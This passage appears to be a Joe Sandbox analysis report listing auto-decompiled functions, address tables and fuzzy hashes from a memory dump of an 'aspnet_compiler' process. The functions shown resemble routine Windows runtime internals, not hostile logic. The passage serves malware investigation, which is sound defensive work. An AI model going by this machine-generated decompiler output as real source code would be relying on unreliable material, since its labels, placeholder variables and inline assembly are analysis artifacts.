					if(E01116EBE(_t80, _t64, _t75) != 1) {
						goto L23;
					}
					goto L15;
				}
				asm("lock inc dword [ecx+0xc]");
				if( *((intOrPtr*)(_t64 + 0x2c)) != 1 ||  *((intOrPtr*)(_t64 + 8)) > _t69) {
					goto L14;
				} else {
					_t73 = _t59;
					asm("lock xadd [eax], edx");
					if(_t73 + _t59 > _v8) {
						if(_t73 <= _v8) {
							 *(_t64 + 4) = _t73;
						}
						goto L14;
					}
					_t77 = _t73 + _t64;
					_v8 = _t77;
					 *_a12 = _t64;
					_t66 = _a8;
					if(_t66 == 0) {
						L12:
						_t39 = _t77;
						goto L13;
					}
					_t52 =  *((intOrPtr*)(_t80 + 0x10));
					if(_t52 != 0) {
						_t53 = _t52 - 1;
						if(_t53 == 0) {
							asm("rdtsc");
							 *_t66 = _t53;
							L11:
							 *(_t66 + 4) = _t73;
							goto L12;
						}
						E01106A60(_t66);
						goto L12;
					}
					while(1) {
						_t73 =  *0x7ffe0018;
						_t82 =  *0x7FFE0014;
						if(_t73 ==  *0x7FFE001C) {
							break;
						}
						asm("pause");
					}
					_t66 = _a8;
					_t77 = _v8;
					 *_t66 = _t82;
					goto L11;
				}
			}

0x01116de6
0x01116dee
0x01116df1
0x01116df4
0x01116dfd
0x011505d3
0x011505d3
0x011505e4
0x011505f9
0x011505f9
0x011505fe
0x01116e96
0x01116e9c
0x01116e9c
0x01116e03
0x01116e09
0x01116e0c
0x01116e12
0x01116e15
0x01116e1b
0x011505a1
0x01116eb1
0x01116eb1
0x01116eb1
0x01116e21
0x01116e2a
0x01116e9f
0x01116eab
0x00000000
0x00000000
0x00000000
0x01116eab
0x01116e2c
0x01116e34
0x00000000
0x01116e3d
0x01116e3d
0x01116e42
0x01116e4d
0x011505ac
0x011505b2
0x011505b2
0x00000000
0x011505ac
0x01116e56
0x01116e59
0x01116e5d
0x01116e5f
0x01116e64
0x01116e94
0x01116e94
0x00000000
0x01116e94
0x01116e6a
0x01116e6d
0x011505ba
0x011505bd
0x011505ca
0x011505cc
0x01116e91
0x01116e91
0x00000000
0x01116e91
0x011505c0
0x00000000
0x011505c0
0x01116e7e
0x01116e7e
0x01116e80
0x01116e86
0x00000000
0x00000000
0x01116eba
0x01116eba
0x01116e88
0x01116e8b
0x01116e8f
0x00000000
0x01116e8f

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f5923ccfc62e11761a64181f477a9fcd764954153fe337c5a9bd4bea8846838
Instruction ID: de7a82884804c0447e8e15e5acd1d24d8b6a5c151406c8c6772e86f36d61a376
Opcode Fuzzy Hash: 8f5923ccfc62e11761a64181f477a9fcd764954153fe337c5a9bd4bea8846838
Instruction Fuzzy Hash: 9731B331205211DFC72DCF28C080A66F7A2FF85315B15CA6DE42A8B245DB72F802CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0110A70E Relevance: .1, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0110A70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x11c7b10; // 0x0
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x11c7b10 = 8;
					 *0x11c7b14 = 0x11c7b0c;
					 *0x11c7b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x1
					E0110A990(0x11c7b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L0110A840(__edx, __ecx, __ecx, _t52, 0x11c7b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x11c7b10; // 0x0
					_t3 = _t37 + 0x27; // 0x27
					__eflags = _t3 >> 5 -  *0x11c7b18; // 0x0
					if(__eflags > 0) {
						_t38 =  *0x11c7b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x27
						_v8 = _t4 >> 5;
						_t50 = L010F4620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x11c7b18 = _v8;
						_t8 = _t52 + 7; // 0x7
						E0111F3E0(_t50,  *0x11c7b14, _t8 >> 3);
						_t28 =  *0x11c7b14; // 0x0
						__eflags = _t28 - 0x11c7b0c;
						if(_t28 != 0x11c7b0c) {
							L010F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x8
						 *0x11c7b14 = _t50;
						_t48 = _v12;
						 *0x11c7b10 = _t9;
						goto L6;
					}
					 *0x11c7b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}

0x0110a713
0x0110a714
0x0110a717
0x0110a71d
0x0110a720
0x0110a722
0x0110a727
0x0110a74a
0x0110a754
0x0110a75e
0x0110a768
0x0110a76a
0x0110a773
0x0110a78b
0x0110a790
0x0110a792
0x0110a741
0x0110a741
0x0110a743
0x0110a749
0x0110a749
0x0110a732
0x0110a73a
0x0110a797
0x0110a79d
0x0110a7a3
0x0110a7a9
0x0110a7b6
0x0110a7bc
0x0110a7ca
0x0110a7e0
0x0110a7e2
0x0110a7e4
0x01149bf2
0x00000000
0x01149bf2
0x0110a7ed
0x0110a7f2
0x0110a800
0x0110a805
0x0110a80d
0x0110a812
0x01149c08
0x01149c08
0x0110a818
0x0110a81b
0x0110a821
0x0110a824
0x00000000
0x0110a824
0x0110a7ae
0x00000000
0x0110a7ae
0x0110a73c
0x0110a73e
0x00000000

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: adb3cef83b475b132dad4b36322d2bf73aa10fbfeeacecf53e22db693be0296e
Instruction ID: fbef06077451ee246a7fb96309fa7b4d52890a732ae1f5f81ea3407d5bc8071b
Opcode Fuzzy Hash: adb3cef83b475b132dad4b36322d2bf73aa10fbfeeacecf53e22db693be0296e
Instruction Fuzzy Hash: 3B31C0B1A006059FC72ECB48F880F55BBF9FB94710F15496AE226872C4D7F1A981CF92

Uniqueness

Uniqueness Score: -1.00%

Function 011061A0 Relevance: .1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E011061A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E01105E50(0x10b67cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E011A9D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E010DF7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}

0x011061b3
0x011061b5
0x011061bd
0x011061c3
0x011061c7
0x011061d2
0x011061ff
0x011061ff
0x01106201
0x01106207
0x01106207
0x011061d4
0x011061d9
0x00000000
0x00000000
0x011061df
0x011061e2
0x00000000
0x00000000
0x011061e6
0x011061e8
0x011061ee
0x011061ee
0x011061f9
0x0114762f
0x01147632
0x01147635
0x01147639
0x01147640
0x0114766e
0x01147675
0x00000000
0x00000000
0x01147681
0x01147689
0x0114768d
0x01147691
0x01147695
0x01147699
0x011476af
0x011476b5
0x011476b7
0x011476b7
0x011476d7
0x011476dc
0x00000000
0x011476dc
0x011476a2
0x011476a9
0x01147651
0x01147653
0x01147653
0x01147656
0x01147656
0x00000000
0x01147656
0x01147644
0x01147646
0x01147648
0x01147648
0x00000000
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 906886b3580ed4115c934a366783a688ffa8c2f25452c1104fa03a2396e32fb6
Instruction ID: 41b6bffbe2f69a6223763241d649a9b57ee5497a040480d528f5f35962339020
Opcode Fuzzy Hash: 906886b3580ed4115c934a366783a688ffa8c2f25452c1104fa03a2396e32fb6
Instruction Fuzzy Hash: D8318F71A053018FE369CF1DC840B26BBE6FB98B00F05496DF9989B391E7B0D844CB92

Uniqueness

Uniqueness Score: -1.00%

Function 010DAA16 Relevance: .1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E010DAA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x11cd360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x11c7b9c; // 0x0
					_t53 = L010F4620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E0111B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E0111F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L010E6C59(_t53, _t51, _t58) != 0) {
							_t28 = E01105E50(0x10bc338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E0110B230(_v32, _v28, 0x10bc2d8, 1,  &_v24);
								_t28 = E010DF7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L010F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}

0x010daa25
0x010daa29
0x010daa2d
0x010daa30
0x010daa37
0x010daa3c
0x01134458
0x01134458
0x01134472
0x01134474
0x01134476
0x010daa64
0x010daa74
0x0113447c
0x01134483
0x01134492
0x010daa52
0x010daa54
0x010daa5e
0x011344a8
0x011344ad
0x011344af
0x011344b6
0x011344b6
0x011344b9
0x011344bc
0x011344cd
0x011344d3
0x011344d6
0x011344e1
0x011344e1
0x011344e6
0x011344e8
0x011344fb
0x011344fb
0x011344e8
0x00000000
0x010daa5e
0x01134476
0x010daa42
0x010daa46
0x010daa48
0x010daa4c
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99a3aecddba45092d58446db32f0c636ba8258fcd4f6aa268452f8cb2f13a2dc
Instruction ID: 2119d7a9c949f1fbef8a0b9f07e1495794528ef6936b3c73180a0c14b7b038dc
Opcode Fuzzy Hash: 99a3aecddba45092d58446db32f0c636ba8258fcd4f6aa268452f8cb2f13a2dc
Instruction Fuzzy Hash: 0031E171A0022AEBCF159F68CD81ABFB7B9FF44700F054069F945EB244E774AA51CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 01118EC7 Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E01118EC7(void* __ecx, void* __edx) {
				signed int _v8;
				signed int* _v16;
				intOrPtr _v20;
				signed int* _v24;
				char* _v28;
				signed int* _v32;
				intOrPtr _v36;
				signed int* _v40;
				signed int* _v44;
				signed int* _v48;
				intOrPtr _v52;
				signed int* _v56;
				signed int* _v60;
				signed int* _v64;
				intOrPtr _v68;
				signed int* _v72;
				char* _v76;
				signed int* _v80;
				signed int _v84;
				signed int* _v88;
				intOrPtr _v92;
				signed int* _v96;
				intOrPtr _v100;
				signed int* _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				signed int* _v152;
				char _v156;
				signed int* _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x11cd360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E01104E70(0x11c86e4, 0x1119490, 0, 0);
					if( *0x11c53e8 > 5 && E01118F33(0x11c53e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x11c53e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x11c53e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x10bbc46;
						_t48 = E01157B9C(0x11c53e8, 0x10bbc46, _t67, 0x11c53e8, _t70,  &_v140);
					}
				}
				return E0111B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}

0x01118ec7
0x01118ed9
0x01118edc
0x01118ee6
0x01118ee9
0x01118eee
0x01118efc
0x01118f08
0x01151349
0x01151353
0x0115135d
0x01151366
0x0115136f
0x01151375
0x0115137c
0x01151385
0x01151390
0x01151391
0x0115139c
0x0115139d
0x011513a6
0x011513ac
0x011513b2
0x011513b5
0x011513bc
0x011513bf
0x011513c2
0x011513c5
0x011513c8
0x011513cb
0x011513ce
0x011513d1
0x011513d4
0x011513d7
0x011513da
0x011513dd
0x011513e0
0x011513e3
0x011513e6
0x011513e9
0x011513f6
0x01151400
0x01151400
0x01118f08
0x01118f32

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76c436a712a22f5597d602616975dc7d06f9490c9ec458a883d3706d5d73b48b
Instruction ID: f7a09e36ea09a71d80e11bf7e98fe0d8dab23ddbe2448be0bad46d0eaf80ac97
Opcode Fuzzy Hash: 76c436a712a22f5597d602616975dc7d06f9490c9ec458a883d3706d5d73b48b
Instruction Fuzzy Hash: 0D41C0B1D003189FDB24CFAAD980AADFBF5FB48710F5081AEE519A7240E7749A84CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0110E730 Relevance: .1, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E0110E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E01119670() < 0) {
					E0112DF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x11c7b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L010F4620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M0110E810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

0x0110e730
0x0110e736
0x0110e738
0x0110e73d
0x0110e73e
0x0110e740
0x0110e749
0x0110e765
0x0110e76a
0x0110e76b
0x0110e76c
0x0110e76d
0x0110e76e
0x0110e76f
0x0110e775
0x0110e777
0x0110e77e
0x0114b675
0x0110e784
0x0110e784
0x0110e789
0x0110e7a8
0x0110e7ac
0x0110e807
0x0110e7ae
0x0110e7ae
0x0110e7b1
0x0110e7b4
0x0110e7b9
0x0110e7c0
0x0110e7c4
0x0110e7ca
0x0110e7cc
0x00000000
0x0110e7d3
0x0110e7d6
0x00000000
0x00000000
0x0110e7ff
0x0110e802
0x00000000
0x00000000
0x0110e7f9
0x0110e7fc
0x00000000
0x00000000
0x0110e7f3
0x0110e7f6
0x00000000
0x00000000
0x0110e7ed
0x0110e7f0
0x00000000
0x00000000
0x0110e7e7
0x0110e7ea
0x00000000
0x00000000
0x0114b685
0x0114b688
0x00000000
0x00000000
0x0114b682
0x00000000
0x00000000
0x0110e7cc
0x0110e7d9
0x0110e7dc
0x0110e7de
0x0110e7de
0x0110e7ac
0x0110e7e4
0x0110e74b
0x0110e751
0x0110e759
0x0110e761
0x0110e761

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1339c9f78493827ed89e1f189109a9324fc62bde4d1b250256973d0541f2390
Instruction ID: 788cacdb360296bdde70a8ea93aea00c83c591b5cfdedf0a0f99782ace24e18a
Opcode Fuzzy Hash: e1339c9f78493827ed89e1f189109a9324fc62bde4d1b250256973d0541f2390
Instruction Fuzzy Hash: AC31AC75A04249AFD749CF19C841B8ABBE8FB08314F148666FA14CB381E771E980CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0110BC2C Relevance: .1, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0110BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x11c6100; // 0x5
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E010F2280(0xd, 0x58df1a0);
				_t41 =  *0x11c60f8; // 0x0
				if(_t41 != 0) {
					 *0x11c60f8 =  *_t41;
					 *0x11c60fc =  *0x11c60fc + 0xffff;
				}
				E010EFFB0(_t41, 0x800, 0x58df1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x11c60f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L010F4620(0x11c6100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x11c6100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}

0x0110bc36
0x0110bc42
0x0110bc45
0x0110bc4a
0x0110bd35
0x00000000
0x00000000
0x00000000
0x00000000
0x0110bc50
0x0110bc50
0x0110bc58
0x0110bc5a
0x0110bc60
0x00000000
0x00000000
0x0114a4f2
0x0114a4f6
0x00000000
0x00000000
0x00000000
0x0114a4fc
0x0110bc79
0x0110bc7e
0x0110bc86
0x0110bd16
0x0110bd20
0x0110bd20
0x0110bc8d
0x0110bc94
0x0110bcbd
0x0110bcca
0x0110bccb
0x0110bccc
0x0110bccd
0x0110bcce
0x0110bcd4
0x0110bcea
0x0110bcee
0x0110bcf2
0x0110bd00
0x0110bd04
0x00000000
0x0110bc96
0x0110bcab
0x0110bcaf
0x0110bd2c
0x0110bd2c
0x0110bd09
0x00000000
0x0110bd09
0x0110bcb1
0x0110bcb5
0x0110bcbb
0x00000000
0x00000000
0x00000000
0x0110bcbb

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a3c86039d2d062bbabfbc68fe2869b8fe0c9a5da2a056a9e8ca31d07787db42
Instruction ID: 8ca7034e03d7744bba55d05661b18e5f05c9fd2fbbc59e0f0eecafb53463a5f8
Opcode Fuzzy Hash: 1a3c86039d2d062bbabfbc68fe2869b8fe0c9a5da2a056a9e8ca31d07787db42
Instruction Fuzzy Hash: 8431563AA046029FCB1ADF58D4807AA77B4FF68315F054079ED54EB385E7B0C945CB85

Uniqueness

Uniqueness Score: -1.00%

Function 010D9100 Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E010D9100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x11af6e8);
				E0112D0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E011A88F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E0112D130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x11c86c0; // 0xe107b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x11c86b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E010F2280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E011A88F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E0111AFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
